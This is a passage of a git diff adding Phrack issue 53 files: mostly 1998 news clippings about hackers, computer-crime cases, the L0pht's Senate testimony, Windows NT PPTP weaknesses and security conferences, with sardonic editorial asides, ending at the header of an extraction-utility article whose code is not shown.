+"There's no one tool to solve all the security problems throughout your
+network," says Jim Patterson, vice president of security and
+telecommunications at Oppenheimer Funds, in Denver... 
+
+[snip...]
+
+
+0x1a>------------------------------------------------------------------------
+
+Title: Hackers' Dark Side Gets Even Darker
+Author: Douglas Hayward
+
+LONDON -- The hacker community is splitting into a series of distinct
+cultural groups -- some of which are becoming dangerous to businesses and
+a potential threat to national security, an official of Europe's largest
+defense research agency warned Thursday. New types of malicious hackers
+are evolving who use other hackers to do their dirty work, said Alan Hood,
+a research scientist in the information warfare unit of Britain's Defense
+Evaluation and Research Agency (DERA).
+
+Two of the most dangerous types of malicious hackers are information
+brokers and meta-hackers, said Hood, whose agency develops security
+systems for the British military.  Information brokers commission and pay
+hackers to steal information, then resell the information to foreign
+governments or business rivals of the target organizations.
+
+Meta-hackers are sophisticated hackers who monitor other hackers without
+being noticed, and then exploit the vulnerabilities identified by these
+hackers they are monitoring. A sophisticate meta-hacker effectively uses
+other hackers as tools to attack networks. "Meta-hackers are one of the
+most sinister things I have run into," Hood said. "They scare the hell out
+of me."
+
+[Great.. more terms and lousy journalism..]
+
+DERA is also concerned that terrorist and criminal gangs are preparing to
+use hacking techniques to neutralize military, police and security
+services, Hood said.
+
+[Criminal gangs.. oooh...]
+
+[snip...  lame stereotype crap]
+
+0x1b>------------------------------------------------------------------------
+
+Title: Japan Fears It's Becoming a Base for Hackers
+Source: Daily Yomiuri On-Line
+Author: Douglas Hayward
+Date: 4/29/98
+
+To fill in legal loopholes that have caused an increase in unauthorized
+computer access, the National Police Agency has set up a group of experts
+to study how to prevent Internet crimes. 
+ 
+Unlike Europe and the United States, Japan has no law prohibiting
+unauthorized access to computers through the Internet. There has been a
+stream of reports of anonymous hackers accessing corporate servers. 
+
+[Gee, they have no laws making hacking illegal, and they wonder why
+ they are becoming a base for hackers? Bright.]
+
+[snip...]
+
+The Japan Computer Emergency Response Team Coordination Center has been
+studying cases of unauthorized access through the Net, and found a total
+of 644 from the time of the center's establishment in October 1996 to last
+month. 
+ 
+Meanwhile, police uncovered 101 high-tech crimes in 1997, three times as
+many as in the previous year. 
+
+0x1c>------------------------------------------------------------------------
+
+Title: Kevin Mitnick Hacker Case Drags On and On
+Source: ZDTV
+Author: Kevin Poulsen
+Date: 4/28/98
+
+[If you haven't visited, go to www.kevinmitnick.com right now.]
+
+LOS ANGELES-- "Now, have we made any progress here?" 
+
+With those words, Judge Mariana Pfaelzer opened the latest hearing in the
+Kevin Mitnick case in L.A.'s U.S. District Court Monday. She might as well
+have said, "Let's get ready to rumble."
+
+It's now been more than three years since a dramatic electronic manhunt
+ended with Mitnick's arrest, national headlines, books and movie deals.
+
+Since then, the excitement has faded. The books oversaturated the market; 
+the movies never got made.  And the once fast-paced story of a compulsive
+hacker with a goofy sense of humor is mired in its epilogue: the slow ride
+to disposition over the speed-bumps of the federal justice system.
+
+[snip...]
+
+But only some of it. The government wants to keep a tight lid on the
+"proprietary" software in the case, and on what it calls "hacker tools." 
+The defense can review these files, but they can't have their own copies
+for analysis.
+
+[snip...]
+
+If the evidence was in paper form, the government would have probably
+agreed. But Painter says that with electronic evidence, "it's too easy for
+this to be disseminated by the defendants."
+
+In other words, the government doesn't want the data to show up on a Web
+site in Antigua. 
+
+[snip...]
+
+0x1d>------------------------------------------------------------------------
+
+Title: Millions Lost to Phone Hackers
+Author: Andrew Probyn
+
+MILLIONS of dollars are being ripped off phone users in Australia by
+hackers using increasingly elaborate phone scams.  Households, businesses
+and mobile phone users have become victims of widespread and systematic
+phone fraud. 
+
+[Hackers using phone scams?]
+
+As carriers Telstra and Optus make advances in protecting their
+telecommunications networks, hackers are increasingly adept at breaking
+their security codes to rip off users.
+
+The Herald Sun has discovered many cases of billing discrepancies blamed
+on hackers, including one householder charged $10,000 for calls he said he
+never made. 
+
+A Herald Sun investigation has also shown:  SEX calls to chat lines in the
+United States, Guyana, the Dominican Republic, Russia, Chile and the
+Seychelles are commonly charged to other people's accounts.  HACKERS can
+divert their Internet, local and international call costs without
+detection. 
+
+[Why do I think they are using 'hackers' for any sex-fiend that stole
+ a code?]
+
+[snip...]
+
+"Hacking could be costing consumers in the region of millions of dollars," 
+he said. "Some of these calls are very expensive - sex calls, for example,
+can be up to $30 just to be connected."
+
+[snip...]
+
+0x1e>------------------------------------------------------------------------
+
+Title: Hackers on the Hill
+Author: Annaliza Savage
+
+[FINALLY...get some incredible hackers up there to school these
+ weenies. Go l0pht!]
+
+Seven hackers will face the Senate Government Affairs Committee Tuesday. 
+But they aren't in any trouble. 
+
+The seven hackers have been invited by Senator Fred Thompson (R-Tenn.)--
+the sometime-actor you may remember from such films as The Hunt For Red
+October and Die Hard 2-- to testify about the state of the US Government's
+computer networks.
+
+The seven-- Mudge, King Pin, Brian Oblivian, Space Rouge, Weld Pond, Tan
+and Stefan-- are all members of the L0pht, a hacker hangout in Boston, and
+have been part of the hacker underground for years. 
+
+"We were surprised to get an email from a senator's aide. We have had some
+contacts with law enforcement over the years, but this was something
+completely different," said Weld Pond. 
+
+[snip...]
+
+"We are trying to return the label hacker to the badge of honor it used to
+be in the old days. A word that means knowledge and skill, not criminal or
+script-kiddies, as it does in the popular press today," Weld Pond said. 
+
+[snip...]
+
+When Thompson's aide, John Pede, showed up at the L0pht to discuss the
+Senate hearings with the group, the irony of the visit wasn't wasted on
+hackers. Weld Pond explained: "We thought about blindfolding him on the
+way over here but decided against it in the end. The visit was a little
+uncomfortable. When the FBI has reporters visit them they clean up quite a
+bit and keep an eagle eye on the visitors. This was no different except
+the tables were turned." 
+
+Mudge was glad to be able to show off the l0pht to the men in suits. "We
+actually enjoyed having the government officials over. It's a wonderful
+sight when we bring guests over to the l0pht and their jaws drop on the
+floor after seeing all of the stuff we have managed to engineer and get
+working. Especially when they realize it has all been without any formal
+funding." 
+
+[snip...]
+
+0x1f>------------------------------------------------------------------------
+
+Title: RSA Sues Network Associates
+Source: CNET NEWS.COM
+Author: Tim Clark
+Date: 5.20.98
+
+RSA Data Security is seeking to bar Network Associates from shipping any
+Trusted Information Systems software that uses RSA encryption technology.
+
+[Nyah nyah!]
+
+Earlier this year, Network Associates acquired TIS, licensed by RSA to use
+its encryption algorithms in TIS virtual private network software. RSA is
+a wholly owned subsidiary of Security Dynamics.
+
+[snip...]
+
+"RSA is a company based on intellectual property," said Paul Livesay,
+RSA's general counsel. "Right now we perceive Network Associates as having
+an approach to doing business by acquiring companies and ignoring
+third-party agreements, so why would we want to assign the license to TIS
+to a party that operates in that manner?"
+
+0x20>------------------------------------------------------------------------
+
+Title: Clinton to Outline Cyberthreat Policy
+Source: CNET NEWS.COM
+Author: Tim Clark
+Date: 5.21.98
+
+In a commencement speech at the U.S. Naval Academy tomorrow, President
+Clinton is expected to highlight cyberthreats to the nation's electronic
+infrastructure, both from deliberate sabotage and from accidents such as
+the satellite outage that silenced pagers across the nation this week. 
+   
+Clinton also is expected to outline two new security directives, one aimed
+at traditional terrorism and the other at cyberthreats. The cyberthreats
+directive follows last year's report from the Presidential Commission on
+Critical Infrastructure Protection. 
+
+[snip...]
+
+"Clinton will announce a new policy for cyberterrorism based on the
+recommendations of the commission, stressing the fact that we need
+private-sector help to solve this problem, since the private sector owns
+80 to 90 percent of the nation's infrastructure," said P. Dennis LeNard
+Jr., deputy public affairs officer at PCCIP. Under the new policy, that
+agency will become the Critical Infrastructure Assurance Office, or CIAO. 
+   
+Clinton also is expected to order federal agencies to come up with a plan
+within three to five years that identifies vulnerabilities of the nation's
+infrastructure and responses to attacks as well as creating a plan to
+reconstitute the U.S. defense system and economy if a cyberattack
+succeeds, said a former White House staffer familiar with Clinton's
+speech. 
+
+[Three to five years.. how.. timely.]
+
+[snip...]
+
+"The Department of Justice is not keen on sharing information that could
+lead to criminal prosecutions," the official said. "The private sector
+does not trust the FBI, and the FBI doesn't want to give out secrets.
+They're afraid that if they share information, they may someday have to
+testify in court." 
+   
+0x21>------------------------------------------------------------------------
+
+Title: Programmer Sentenced for Military Computer Intrusion
+Source: CNN
+Date: 5.25.98
+
+DAYTON, Ohio (AP)- A computer programmer was sentenced to six months at a
+halfway house for gaining access to a military computer that tracks Air
+Force aircraft and missile systems. 
+
+Steven Liu, 24, was also fined $5,000 Friday after pleading guilty to
+exceeding authorized access to a computer. 
+
+Liu, a Chinese national who worked for a military contractor in Dayton,
+downloaded passwords from a $148 million database at Wright-Patterson Air
+Force Base. He said he accidentally discovered the password file and used
+it to try to find his job-performance evaluation. 
+
+[snip...]
+
+0x22>------------------------------------------------------------------------
+
+Title: Editorial - Hacker vs Cracker, Revisited
+Source: OTC: Chicago, Illinois
+Author: Bob Woods
+Date: 5.22.98
+
+Newsbytes. If a person talks about or writes a news story regarding a
+hacker, one creates an image that is perpetuated in a Network Associates
+TV ad: the heavily tattooed, ratty looking cyberpunk who breaks into
+systems and posts proprietary information on the Internet for the same
+reason "why (I) pierce (my) tongue." The big problem, though, is that
+person is more accurately described as a "cracker," not a "hacker." 
+
+   ZDTV CyberCrime correspondent Alex Wellen said earlier this week that
+"cracker" is gaining acceptance in the media -- and quoted an old column
+of mine in the process. Because of this unexpected exposure, I decided to
+take a second look at my old work. 
+
+   First, here's the text of my January 23, 1996 column: 
+
+   Our readers have their hackles up when hacker is mentioned in our
+stories. "Hackers," they argue, are good people who just want to learn
+everything about a computer system, while "crackers" are the ones who are
+breaking into computer systems illegally. 
+
+   The problem arises when the public and people who shape society get a 
+hold of terms like "hacker" -- a word once viewed as non-threatening,  but
+is now turned into a name that conjures up visions of altered World  Wide
+Web pages and crashed computer systems. 
+
+   "Que's Computer and Internet Dictionary, 6th Edition," by Dr. Bryan 
+Pfaffenberger with David Wall, defines a hacker as "A computer  enthusiast
+who enjoys learning everything about a computer system and,  through clever
+programming, pushing the system to its highest possible  level of
+performance." But during the 1980s, "the press redefined the  term to
+include hobbyists who break into secured computer systems,"  Pfaffenberger
+wrote. 
+
+   At one time hackers -- the "good" kind -- abided by the "hacker ethic," 
+which said "all technical information should, in principle, be freely
+available to all. Therefore gaining entry to a system to explore data and
+increase knowledge is never unethical," according to the Que dictionary. 
+
+   These ethics applied to the first-generation hacker community, which
+Que said existed from roughly 1965 to 1982. While some of those people do
+still exist, many other people who describe themselves as "hackers"  are a
+part of the current generation of people who "destroy, alter, or move data
+in such a way that could cause injury or expense" -- actions that are
+against the hacker ethic, Que's dictionary said. Many of those actions are
+also against the law.
+
+   Today's hacker generation -- the ones bent on destruction -- are more
+accurately called "crackers." Que defines such a person as "A computer
+hobbyist who gets kicks from gaining unauthorized access to computer
+systems. Cracking is a silly, egotistical game in which the object is to
+defeat even the most secure computer systems. Although many crackers do
+little more than leave a 'calling card' to prove their victory, some
+attempt to steal credit card information or destroy data. Whether or not
+they commit a crime, all crackers injure legitimate computer users by
+consuming the time of system administrators and making computer resources
+more difficult to access." 
+
+   Here's the rub: whenever the media, including Newsbytes, uses the term
+"hacker," we are hit with complaints about the term's usage.  E-mails to
+us usually say "I'm a hacker, yet I don't destroy anything."  In other
+words, the people who write us and other media outlets are a part of the
+first generation of hackers.
+
+   But the media reflects society as much as, if not more than, they
+change or alter it. Today's culture thinks of hackers as people who
+destroy or damage computer systems, or ones who "hack into" computers to
+obtain information normal people cannot access. While it's probably the
+media's fault, there's no going back now -- hackers are now the same
+people as crackers.
+
+   Besides, if a person outside of the computer biz called someone a
+cracker, images of Saltines or a crazy person or an investigator in a
+popular British television series would probably come to mind. For most
+people on the street, the last thing they would think of is a person they
+know as a hacker.
+
+   So, what's to be done about the situation? Not a whole heck of a lot,
+unfortunately. The damage is done. If more people in the "general public" 
+and the "mainstream media" read this news service and saw this article,
+some headway might be made. But even if they did, cultural attitudes and
+thoughts are very difficult to change. For those people in the US --
+remember New Coke? Or the metric system? If you're outside the US, can you
+imagine calling football "soccer?"
+
+   And to the first generation of hackers -- those of us "in the know"  in
+this industry do know about you. When we report on hackers nowadays, we're
+not talking about you, and we do not mean to insult you. Honest.
+
+   ===  Today's Opinion 
+
+   Okay, so that last paragraph was a bit on the hokey side. Alright, so
+it was really hokey. But from what I remember, we had been getting quite a
+few angry e-mails at the time regarding our usage of "hacker,"  and I was
+trying to do a bit of damage control. But if memory serves me correctly,
+we received a couple of "nice try" letters after we published the
+editorial. Nice try? Well, I thought it was.
+
+   But, was it a "safe" editorial? Sure. But it was -- and still is --
+also "safe" to just write about "hackers" and offend a few people, rather
+than use the term "cracker" and leave a bunch of people scratching their
+heads over what the heck a "cracker" even was.
+
+   While I'm seeing "cracker" more and more in computer-related
+publications (unfortunately, though, not in ours as much as I'd like to
+see) these days, the term is sorely lacking in the widely
+read/viewed/listened-to media outlets.
+
+   I'll take the liberty of quoting what ZDTV's Wellen quoted me as saying
+two years ago: "If more people in the 'general public' and the 'mainstream
+media' read this news service and saw this article, some headway might be
+made (in accurately calling people crackers instead of hackers)." 
+
+   Now, I can see a mainstream media-type -- I used to be one of these
+people, by the way -- wondering how in the heck can they get their average
+seventh-grade audience to understand that a cracker is different from a
+hacker. It's easy for us computer/IT journalist types to write to our
+expectations of our audience, because it is generally pretty much like us. 
+
+   The answer, though, is pretty easy. Here's an example: 
+
+   "Two teenage hackers, more accurately known as 'crackers,' illegally
+entered into the Pentagon's computer system and took it out in an
+overnight attack." The real trick, then, is to never again use "hacker" 
+in the story. Just use "cracker." Your audience will pick up on this,
+especially if you do it in all of your stories. I promise.
+
+   So there. My unwieldy media consulting bill is now in the mail to all
+of the non-computing local and national media outlets.
+
+0x23>------------------------------------------------------------------------
+
+Title: Windows NT Security Under Fire
+Author: Chris Oakes
+Date: 6.1.98
+
+Listen to security expert and consultant Bruce Schneier and he'll tell you
+that Windows NT's security mechanism for running virtual private networks
+is so weak as to be unusable. Microsoft counters that the issues Schneier
+points out have mostly been addressed by software updates or are too
+theoretical to be of major concern. 
+
+Schneier, who runs a security consulting firm in Minneapolis, says his
+in-depth "cryptanalysis" of Microsoft's implementation of the
+Point-to-Point Tunneling Protocol (PPTP) reveals fundamentally flawed
+security techniques that dramatically compromise the security of company
+information. 
+                     
+"PPTP is a generic protocol that will support any encryption. We broke the
+Microsoft-defined [encryption] algorithms, and also the Microsoft control
+channel." However, he said he was unaware of some of Microsoft's NT 4.0
+updates when he ran his tests. 
+                     
+With relative ease, intruders can exploit the flaws, Schneier said, which
+he summarizes as weak authentication and poor encryption implementation.
+The result is that passwords can be easily compromised, private
+information can be disclosed, and servers used to host a virtual private
+network, or VPN, can be disabled through denial-of-service attacks,
+Schneier said. 
+                     
+It's kindergarten cryptography. These are dumb mistakes," Schneier said. 
+
+In letting companies use the public Internet as a means for establishing
+"private" company networks, VPN products use the protocol to establish the
+"virtual" connections between remote computers. 
+
+PPTP secures the packets sent via the Internet by encapsulating them in
+other packets. Encryption is used to further secure the data contained in
+the packets. It is the scheme Microsoft uses for this encryption that
+Schneier says is flawed. 
+
+Specifically, Schneier's analysis found flaws that would let an attacker
+"sniff" passwords as they travel across a network, break open an
+encryption scheme, and mount denial-of-service attacks on network servers,
+which render them inoperable.  Confidential data is therefore compromised,
+he said. 
+
+The nature of the flaws varied, but Schneier identified five primary ones.
+For example, Schneier found a method of scrambling passwords into a code
+-- a rough description of "hashing" -- to be simple enough that the code
+is easily broken.  Though 128-bit "keys" can be used to access the
+encryption feature of the software, Schneier said the simple
+password-based keys that it allows can be so short that information could
+be decrypted by figuring out what may be very simple passwords, such as a
+person's middle name. 
+
+"This is really surprising. Microsoft has good cryptographers in their
+employ." The problem, he said, is that they're not adequately involved in
+product development. 
+
+Schneier emphasized that no flaws were found in the PPTP protocol itself,
+but in the Windows NT version of it. Alternate versions are used on other
+systems such as Linux-based servers. 
+
+Microsoft's implementation is "only buzzword-compliant," Schneier said.
+"It doesn't use [important security features like 128-bit encryption]
+well." 
+
+Windows NT has in the past been the object of several security complaints,
+including denial-of-service vulnerabilities. 
+
+Microsoft says the five primary weaknesses Schneier has called attention
+to are either theoretical in nature, previously discovered, and/or have
+been addressed by recent updates to the operating system software. 
+
+"There's really not much in the way of news here," said Kevin Kean, an NT
+product manager at Microsoft. "People point out security issues with the
+product all the time. 
+
+"We're on our way to enhancing our product to take care of some of these
+situations already," Kean said. 
+
+He acknowledged that the password hashing had been fairly simple, but that
+updates have used a more secure hashing algorithm. He also contends that
+even a weak hashing can be relatively secure. 
+
+The issue of using simple passwords as encryption keys is relevant to
+individual company policy more than Microsoft's product. A company that
+has a policy requiring employees to use long, more complex passwords can
+ensure that their network encryption is more secure. An update to the
+product, Kean said, lets administrators require a long password from
+company employees. 
+
+On another issue, where a "rogue" server could fool a virtual private
+network into thinking it was a legitimate node on the network, Karan
+Khanna, a Windows NT product manager, said while that was possible, the
+server would only intercept of a "stream of gobbledygook" unless the
+attacker had also cracked the encryption scheme. That and other issues
+require a fairly difficult set of conditions, including the ability to
+collect the diverging paths of VPN packets onto a server, to come into
+place. 
+
+For that reason, Microsoft insists its product offers a reasonable level
+of security for virtual private networks, and that upcoming versions of
+the software will make it stronger. 
+
+Windows NT security expert Russ Cooper, who runs a mailing list that
+monitors problems with Windows NT, agrees with Microsoft that most of
+Schneier's findings have been previously turned up and discussed in forums
+like his. What Schneier has done is tested some of them, he said, and
+proven their existence. 
+
+But he points out that fixes for the problems have only recently been
+released, outdating Schneier's tests. The problems may not have been all
+successfully addressed by the fixes, Cooper said, but represent an unknown
+that may negate some of Schneier's findings. 
+
+On Schneier's side, however, Cooper agrees that it typically takes
+publicity of such weaknesses to get Microsoft to release fixes. "Folks
+need to get better response from Microsoft in terms of security,"  Cooper
+said. 
+
+He also added support to a point that Schneier makes -- that Microsoft
+treats security more casually than other issues because it has no impact
+on profit. 
+
+"Microsoft doesn't care about security because I don't believe they think
+it affects their profit. And honestly, it probably doesn't."  Cooper
+believes this is part of what keeps them from hiring enough security
+personnel. 
+
+Microsoft vehemently contests the charge.  Microsoft's Khanna said in
+preparing the next release of the operating system, the company has
+installed a team to attack NT, an effort meant to find security problems
+before the product is released. 
+
+And, Microsoft reminds us, no product is totally secure. "Security is a
+continuum," Microsoft's Kean said. "You can go from totally insecure to
+what the CIA might consider secure." The security issue at hand, he said,
+lies within a reasonable point on that continuum. 
+
+0x24>------------------------------------------------------------------------
+
+Title: New Decoy Technology Designed to Sting Hackers
+Source: ZDNet
+Author: Mel Duvall
+
+There was a sweet bonus for Network Associates Inc. in its recent
+acquisition of intrusion detection company Secure Networks Inc. The
+security vendor gained access to a new technology that is designed to
+sting hackers, not just keep them out. 
+
+Secure Networks is developing a product, code-named Honey Pot, that is
+essentially a decoy network within a network. The idea is to lure hackers
+into the decoy, like flies to a honey pot, to gain as much information
+about their hacking techniques and identity as possible. 
+
+"It's a virtual network in every way, with one exception - it doesn't
+exist," Secure Networks President Arthur Wong said. 
+
+The product is unusual in that it acknowledges a fact of life few
+companies are willing to admit - that hackers can and do break into
+corporate networks. 
+
+Tom Claire, director of product management at Network Associates, said
+after years of denying the problem exists, companies are beginning to take
+intrusion detection seriously. 
+
+"Now they're starting to say, maybe I can watch what hackers are doing in
+my network and find out what they're after and how they do it," he said.
+"Then they can use that knowledge to make their systems better." 
+
+The seriousness of the issue was underscored last week with reports that
+America Online Inc. was suffering from a series of attacks during which
+hackers gained access to subscriber and AOL staff accounts. The intruders
+appeared to gain access by tricking AOL customer service representatives
+into resetting passwords, based on information they obtained by looking at
+member profiles. 
+
+Honey Pot, which is due to be released in the fourth quarter, draws
+hackers in by appearing to offer access to sensitive data. 
+
+Once into the dummy network, hackers spend their time trolling through
+fake files, while the software gains information about their habits and
+tries to trace their source. 
+
+Wong said it's unlikely a hacker's identity can be obtained after one
+visit to the Honey Pot, but once a hacker breaks into a system, he or she
+tends to come back for more. 
+
+"It's like tracing a phone call - the more they return, the more you can
+narrow down their identity," Wong said. 
+
+Larry Dietz, a security analyst at Zona Research Inc., said another
+security company, Secure Computing Corp., built offensive capabilities
+into its Sidewinder firewall as early as 1996, but "strike back" 
+technologies, such as Honey Pot, are still relatively unused in the
+corporate market. 
+
+"It's a good idea if you have a sophisticated user that knows what to do
+with the technology," Dietz said. "But how many companies have the staff
+or the expertise to be security cops?" 
+
+0x25>------------------------------------------------------------------------
+
+Title: Reno dedicates high-tech crime fighting center
+Source: Knight Ridder
+Author: Clif leblanc
+
+COLUMBIA, S.C. -- With the grandeur of a French royal palace, the nation's
+first school for prosecutors was dedicated Monday with a challenge from
+U.S. Attorney Janet Reno to fight 21st century electronic crime.
+
+``When a man can sit in St.  Petersburg, Russia, and steal from a New York
+bank with wire transfers, you know you've got a problem,'' Reno told a
+conference room full of dignitaries at the National Advocacy Center. 
+
+She said the high-tech equipment the center on the University of South
+Carolina campus offers will allow prosecutors to ``fight those who would
+use cyber tools to invade us.''
+
+An estimated 10,000 federal, state and local prosecutors annually will
+learn from the nation's best government lawyers at the $26 million center,
+which takes up about 262,000 square feet and has 264 dormitory rooms for
+prosecutors in training.  Students -- practicing prosecutors from across
+the nation -- will be taught to use digital wizardry and conventional
+classroom training to win convictions against computer criminals, health
+care frauds, employers who discriminate and run-of-the-mill offenders.
+
+The center is a unique facility dreamed up 17 years ago by then-U.S. 
+Attorney General Griffin Bell so government lawyers at all levels could
+learn to prosecute crime better. 
+
+Reno, formerly a state prosecutor in Dade County, Fla., said she was
+especially happy the center will help state and local prosecuting
+attorneys, too. ``I'm a child of the state court system,'' she said. ``It
+is my hope that this institution can lead the way in properly defining the
+roles of state and local ... law enforcement.''
+
+About 95 percent of all prosecutions in the nation are by local
+prosecuting attorneys, said William L. Murphy, president of the National
+District Attorneys Association, who attended Monday's opening. 
+
+Reno said she also wants the center to tap into University of South
+Carolina faculty to teach prosecutors about office management, budgeting,
+alternatives to litigation and even to find better ways for citizens and
+police to work together to fight crime. 
+
+``We can all blaze a trail to make government responsible to its people
+and still make people accountable,'' Reno said in a 15-minute dedication
+speech. 
+
+If the center works as she envisions it, federal prosecutors will get
+better at trying capital cases, and DNA evidence will reduce the chances
+that innocent people will be wrongly convicted, Reno said. 
+
+In her third trip to Columbia, Reno joked good reports from students
+trained at the center have put a stop to early complaints of ``who wants
+to go to Columbia?''
+
+Reno thanked Sen. Fritz Hollings for pushing the idea of the center. She
+recalled that in their first meeting Hollings confronted her with a Forbes
+magazine article that reported the Justice Department was too big, ``and
+there was this little center he wanted to talk about.''
+
+USC President John Palms said when Hollings first approached him about
+placing the center at the school, Palms' immediate answer was:  ``Whatever
+it is, yes.''
+
+But the center has a much bigger role for USC, Palms said. He described
+the dedication as, ``an event that's probably as important as anything
+that's ever happened at the university.''
+
+Hollings, who is seeking re-election to a seventh term in the U.S. 
+Senate, jokingly described the finished facility as, ``a little
+Versailles.'' The 1,300-room Palace of Versailles was the opulent home of
+the French royal family for more than 100 years. 
+
+``This is the most beautiful building the government has ever built,''
+Hollings said. 
+
+``We've got the best of the best for America's prosecutors,'' Hollings
+said. ``Now it's up to us to produce the best.'' [Image]
+
+0x26>------------------------------------------------------------------------
+
+Title: Man poses as astronaut steals NASA secrets
+Source: Reuters
+Date: 6.4.98
+
+HOUSTON (Reuters) [6.4.98] - A licensed airline pilot posing as an
+astronaut bluffed his way into a top-security NASA facility and got secret
+information on the space shuttle during an eight-month deception, federal
+prosecutors said Wednesday. 
+ 
+Jerry Alan Whittredge, 48, faces up to five years in jail and a $250,000
+fine for misrepresenting himself as a federal employee, the U.S.
+Attorney's Office for Southern Texas said. 
+ 
+Whittredge contacted NASA's Marshall Space Center in Huntsville, Alabama,
+in November, claiming he had been chosen for a space shuttle mission and
+requesting a tour of the facility. 
+ 
+According to an affidavit by NASA special agent Joseph Gutheinz,
+Whittredge told NASA officials that he was a CIA agent and held the Medal
+of Honor. 
+ 
+On the basis of his false credentials he was granted a tour on Nov. 21 and
+22. 
+ 
+"Mr. Whittredge was permitted to sit at the console of NASA Mission
+Control (NASA's most secure area) at Marshall Space Flight Center during a
+shuttle mission," the affidavit said. 
+ 
+In March Whittredge tricked NASA into giving him confidential information
+about the shuttle's propulsion system and in May he hoodwinked officials
+at Kingsville Naval Air Station in Texas into giving him training on a
+T-45 flight simulator. 
+ 
+Gutheinz said Whittredge had most recently been living in Texas but did
+not appear to be employed there and that he also had a permanent address
+in Florida. 
+ 
+Whittredge made an initial appearance in court on Tuesday and is due to
+attend a bond hearing on Friday. 
+
+0x27>------------------------------------------------------------------------
+
+
+            DEF CON 6.0 Convention Announcement #1.00 (03.27.98)
+         July 31-August 2 @ The Plaza Hotel and Casino in Las Vegas
+
+IN SHORT:--------------------------------------------------------------------
+
+        WHAT: Speakers & partying in Vegas for hackers from the world over.
+        WHEN: July 31st - August 2nd
+        WHERE: Las Vegas, Nevada @ The Plaza Hotel and Casino
+        COSTS: $40 at the door
+        MORE INFO: http://www.defcon.org/ or email info@defcon.org
+
+
+0x28>------------------------------------------------------------------------
+
+         Network Security Solutions Conference Announcement
+
+                July 29th and 30th, Las Vegas Nevada
+
+
+******************  Call For Papers Announcement ***************************
+
+Network Security Solutions is now accepting papers for its 1998 event.
+Papers and requests to speak will be received and reviewed from March 24th
+until June 1st.  Please submit an outline on a self selected topic
+covering either the problems or solutions surrounding network security. 
+Topics of interest include Intrusion Detection Systems (IDS), distributed
+languages, network design, authentication systems, perimeter protection,
+and more.  Talks will be an hour with a half hour for Q&A.  There will be
+LCD projectors, overhead, and slide projectors. 
+
+Updated announcements will be posted to newsgroups, security mailing lists,
+email, or visit the website at http://www.blackhat.com/
+
+
+0x29>------------------------------------------------------------------------
+
+The Program Chair, Win Treese of Open Market, Inc., and the Program
+Committee announce the availability of the Call for Papers for:
+
+8th USENIX Security Symposium
+August 23-26, 1999
+Marriott Hotel, Washington, D.C.
+
+Sponsored by USENIX, the Advanced Computing Systems Association
+In cooperation with The CERT Coordination Center
+
+================================================
+IMPORTANT DATES FOR REFEREED PAPERS
+Paper submissions due:          March 16, 1999
+Author notification:            April 21, 1999
+Camera-ready final papers due:  July 12, 1999
+================================================
+
+If you are interested in submitting a paper to the committee, proposing
+an Invited Talk, or proposing a tutorial, you can find the Call for
+Papers at http://www.usenix.org/events/sec99/cfp.html.
+
+The USENIX Security Symposium brings together researchers, practitioners,
+system administrators, system programmers, and others interested in the
+latest advances in security and applications of cryptography.
+
+Symposium topics include:
+
+       Adaptive security and system management
+       Analysis of malicious code
+       Applications of cryptographic techniques
+       Attacks against networks and machines
+       Authentication & authorization of users, systems & applications
+       Detecting attacks, intrusions, and computer misuse
+       Developing secure systems
+       File and file system security
+       Network security
+       New firewall technologies
+       Public key infrastructure
+       Security in heterogeneous environments
+       Security incident investigation and response
+       Security of agents and mobile code
+       Technology for rights management & copyright protection
+       World Wide Web security
+
+=============================================================
+USENIX is the Advanced Computing Systems Association.  Its members are
+the computer technologists responsible for many of the innovations in
+computing we enjoy today.  To find out more about USENIX, visit its
+web site: http://www.usenix.org.
+
+0x2a>------------------------------------------------------------------------
+
+		Last Call For Participation - RAID 98
+
+      (also available at http://www.zurich.ibm.com/~dac/RAID98)
+
+   First International Workshop on the Recent Advances in Intrusion
+			      Detection
+
+	   September 14-15, 1998 Louvain-la-Neuve, Belgium
+
+We solicit your participation in the first International Workshop on the 
+Recent Advances in Intrusion Detection (RAID 98). 
+
+This workshop, the first in an anticipated annual series, will bring 
+together leading figures from academia, government, and industry to talk 
+about the current state of intrusion detection technologies and paradigms 
+from the research and commercial perspectives. 
+
+
+We have scheduled RAID 98 immediately before ESORICS 98, at the same time 
+as CARDIS 98, and at the same location as both of these conferences. This 
+provides a unique opportunity for the members of these distinct, yet 
+related, communities to participate in all these events and meet and share 
+ideas during joined organized external events. 
+
+
+The RAID 98 web site: http://www.zurich.ibm.com/~dac/RAID98,
+
+The ESORICS 98 web site: http://www.dice.ucl.ac.be/esorics98. 
+
+The CARDIS 98 web site: http://www.dice.ucl.ac.be/cardis98/ 
+
+0x2b>------------------------------------------------------------------------
+
+                    Computer Security Area (ASC) / DGSCA
+
+                                  DISC    98
+
+                           "Individual Responsability"
+                      
+                     Fifth Computer Security Event In Mexico
+
+                      Mexico, D.F.     November 2-6, 1998
+
+==========================================================================
+
+                        C A L L   F O R   P A P E R S
+
+The goal of DISC 98 event is to create  a conscience about the strategies 
+of security to protect information between the community who uses computers.
+This year the DISC belongs to the most important events of Mexico.  
+
+The computing general congress (http://www.org.org.mx/cuarenta) 
+celebrates forty years of computing in Mexico and convoques those 
+specialist in computer sucurity to participate on this as lecture.
+
+"Individual responsability" is the slogan of this year and suggest 
+that the security of an organization should be totally supported 
+by directive, security responsables, managers, and system's users.
+
+
+WWW    :        http://www.asc.unam.mx/disc98
+
+
+0x2c>------------------------------------------------------------------------
+
+C A L L   F O R  P A P E R S
+
+Assurance for the Global Convergence: 
+Enterprise, Infrastructure and Information Operations
+
+InfoWarCon-9
+Mount Royal Hotel, London, UK
+December 7-9
+
+December 7 - Tutorials
+December 8-9  General Session.
+
+Sponsors:	
+MIS Training Institute - www.misti.com
+Winn Schwartau, Interpact, Inc. - www.infowar.com
+
+
+For more information contact: Voice: 508.879.7999 Fax: 508.872.1153 
+Exhibitors & Sponsorship: Adam Lennon - Alennon@misti.com
+Attendance & Registration: www.misti.com
+
+
+----[  EOF
diff --git a/phrack53/15.txt b/phrack53/15.txt
new file mode 100644
index 0000000..307f36a
--- /dev/null
+++ b/phrack53/15.txt
@@ -0,0 +1,410 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 15 of 15
+
+
+-------------------------[  Phrack Magzine Extraction Utility
+
+
+--------[  Phrack Staff
+
+
+    Neat0!  A python version!  Thanks to  Timmy 2tone <_spoon_@usa.net>.
+By all means, keep sending new versions on in.
+
+
+
+---------------------8<------------CUT-HERE----------->8---------------------
+
+<++> EX/PMEU/extract2.c
